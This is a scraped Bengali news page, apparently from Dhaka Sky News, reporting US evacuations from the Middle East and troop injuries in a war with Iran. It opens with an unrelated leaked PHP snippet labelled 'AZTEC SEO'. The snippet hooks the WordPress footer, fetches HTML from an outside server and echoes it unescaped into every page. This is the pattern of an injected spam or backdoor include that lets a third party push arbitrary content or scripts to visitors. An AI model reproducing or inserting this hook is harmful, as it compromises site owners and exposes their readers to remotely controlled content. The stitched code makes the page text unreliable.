/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); মধ্যপ্রাচ্য ছেড়েছেন ৪৩ হাজারের বেশি মার্কিন নাগরিক, আহত ১৫০ সেনা | Dhaka Sky News

প্রথমবারের মতো স্বেচ্ছামৃত্যুর অনুমতি দিল ভারতের সুপ্রিমকোর্ট

আগের সংবাদ

ইরানে হামলা করে মধ্যপ্রাচ্যের শান্তি নষ্ট করছে ইসরাইল ও যুক্তরাষ্ট্র: উ. কোরিয়া

পরের সংবাদ

মধ্যপ্রাচ্য ছেড়েছেন ৪৩ হাজারের বেশি মার্কিন নাগরিক, আহত ১৫০ সেনা

অনলাইন ডেস্ক

প্রকাশিত: March 11, 2026 , 3:55 pm

ইরানের সঙ্গে সংঘাত শুরু হওয়ার পর মধ্যপ্রাচ্য থেকে ৪৩ হাজারের বেশি মার্কিন নাগরিক যুক্তরাষ্ট্রে ফিরে গেছেন। এছাড়া ইরানের সঙ্গে চলমান যুদ্ধে এখন পর্যন্ত ১৫০ মার্কিন সেনা আহত হয়েছেন।
বুধবার (১১ মার্চ) সংবাদ সংস্থাটির একটি এক্সক্লুসিভ প্রতিবেদনে বলা হয়, এখন পর্যন্ত যুদ্ধে আট মার্কিন সেনা নিহত হয়েছেন। খবর রয়টার্সের।
এ পর্যন্ত ফিরিয়ে আনা ব্যক্তিদের মধ্যে প্রায় ৩০ হাজার জনকে সহায়তা করেছে এ উদ্দেশ্যে গঠিত একটি বিশেষ টাস্কফোর্স।
পররাষ্ট্র দপ্তর জানায়, মধ্যপ্রাচ্য থেকে নাগরিকদের সরিয়ে নিতে দুই ডজনের বেশি চার্টার ফ্লাইট পরিচালনা করা হয়েছে।
তবে এসব ফ্লাইট গড়ে ৪০ শতাংশের কম আসন পূর্ণ ছিল, কারণ অনেক মার্কিন নাগরিক বাণিজ্যিক ফ্লাইট ব্যবহার করে নিজ উদ্যোগেই দেশে ফিরেছেন।
এর আগে, আহতের এই সংখ্যা কখনো প্রকাশ হয়নি। রয়টার্সের এই প্রতিবেদন প্রকাশের পূর্বে মার্কিন প্রতিরক্ষা সদর দফতর পেন্টাগন জানায়, কেবলমাত্র আটজন মার্কিন সেনার গুরুতর আহত হয়েছে।
তবে, রয়টার্সের প্রতিবেদনটি প্রকাশের পর পেন্টাগন এক বিবৃতিতে জানায়, আহত সেনার সংখ্যা প্রায় ১৪০ জন। তবে আহতদের মধ্যে অধিকাংশেরই আঘাত গুরুতর নয়।
পেন্টাগনের মুখপাত্র সিয়ান পারনেল জানান, আহতদের মধ্যে ১০৮ জন এরইমধ্যে ডিউটিতে যোগ দিয়েছেন।
তিনি আরও বলেন, গুরুতর আহত ৮ জনকে সর্বোচ্চ চিকিৎসা দেওয়া হচ্ছে।